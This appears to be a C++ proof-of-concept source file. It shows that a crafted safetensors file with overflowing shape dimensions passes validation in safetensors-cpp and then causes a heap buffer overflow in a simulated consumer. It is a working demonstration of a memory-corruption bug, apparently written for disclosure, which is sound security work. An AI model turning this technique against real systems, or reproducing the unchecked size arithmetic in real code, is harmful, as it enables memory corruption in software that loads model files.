File size: 4,424 Bytes
4c19aea
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
/**
 * crash_overflow.cc - Demonstrates actual heap corruption via integer overflow
 *
 * This simulates what a real consumer of safetensors-cpp would do:
 * 1. Load a safetensors file
 * 2. Get tensor shape
 * 3. Allocate buffer based on shape size
 * 4. Copy/iterate data using shape dimensions
 *
 * The malicious file has shape dimensions that overflow, so:
 * - Buffer allocation uses overflowed (small) size
 * - Data iteration uses shape dimensions that imply huge size
 * - Result: heap buffer overflow
 *
 * Compile: g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash_overflow crash_overflow.cc
 * Run: ./crash_overflow overflow_tensor.safetensors
 */

#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <vector>

#include "safetensors.hh"

/**
 * Simulated consumer function: reshape tensor data according to declared shape.
 * This is what ML frameworks typically do after loading a safetensors file.
 */
void process_tensor(const safetensors::tensor_t &tensor, const uint8_t *data) {
    // A real consumer would use shape to determine iteration bounds
    size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);

    // Compute total elements from shape (uses the SAME vulnerable multiplication)
    size_t total_elements = safetensors::get_shape_size(tensor);  // overflows to 4

    // Allocate output buffer based on computed size
    size_t buf_size = total_elements * dtype_bytes;  // 4 * 4 = 16 bytes
    printf("  Allocating buffer: %zu bytes\n", buf_size);
    float *output = (float *)malloc(buf_size);

    if (!output) {
        printf("  malloc failed\n");
        return;
    }

    // Copy the data - this is "safe" because both use the same overflowed size
    // But the SHAPE is what matters for downstream processing
    memcpy(output, data + tensor.data_offsets[0], buf_size);

    printf("  Buffer allocated and filled: %zu bytes\n", buf_size);

    // NOW: A consumer iterates using shape dimensions for processing
    // e.g., for reshaping, transposing, or element-wise operations
    // This is where the overflow becomes dangerous
    printf("  Shape claims %zu x %zu x %zu = way more than %zu elements\n",
           tensor.shape[0], tensor.shape[1], tensor.shape[2], total_elements);

    // Demonstrate: iterate first dimension only to show OOB access
    // Even just iterating shape[0] (4194305) exceeds our 4-element buffer
    printf("  Iterating shape[0]=%zu elements (but buffer only has %zu)...\n",
           tensor.shape[0], total_elements);

    // This writes beyond the allocated buffer -> HEAP OVERFLOW
    // ASan will catch this immediately
    for (size_t i = 0; i < tensor.shape[0] && i < 100; i++) {
        output[i] = 0.0f;  // OOB write starting at index 4
    }

    printf("  OOB write triggered (ASan should report heap-buffer-overflow)\n");

    free(output);
}

int main(int argc, char *argv[]) {
    const char *filepath = "overflow_tensor.safetensors";
    if (argc > 1) filepath = argv[1];

    printf("=== safetensors-cpp Heap Overflow Crash PoC ===\n\n");

    // Load file
    std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
    if (!ifs.is_open()) {
        fprintf(stderr, "Failed to open %s\n", filepath);
        return 1;
    }
    size_t filesize = ifs.tellg();
    ifs.seekg(0);
    std::vector<uint8_t> data(filesize);
    ifs.read(reinterpret_cast<char*>(data.data()), filesize);
    ifs.close();

    // Parse
    safetensors::safetensors_t st;
    std::string warn, err;
    bool ok = safetensors::load_from_memory(data.data(), data.size(), filepath, &st, &warn, &err);

    if (!ok) {
        printf("FAILED to load: %s\n", err.c_str());
        return 1;
    }

    // Validate (this passes due to overflow)
    std::string val_err;
    if (!safetensors::validate_data_offsets(st, val_err)) {
        printf("Validation failed: %s\n", val_err.c_str());
        return 1;
    }

    printf("[+] File loaded and validated successfully\n");
    printf("[*] Processing tensors...\n\n");

    // Process each tensor
    for (size_t i = 0; i < st.tensors.size(); i++) {
        std::string key = st.tensors.keys()[i];
        safetensors::tensor_t tensor;
        st.tensors.at(i, &tensor);

        printf("Processing tensor '%s':\n", key.c_str());
        process_tensor(tensor, st.storage.data());
    }

    return 0;
}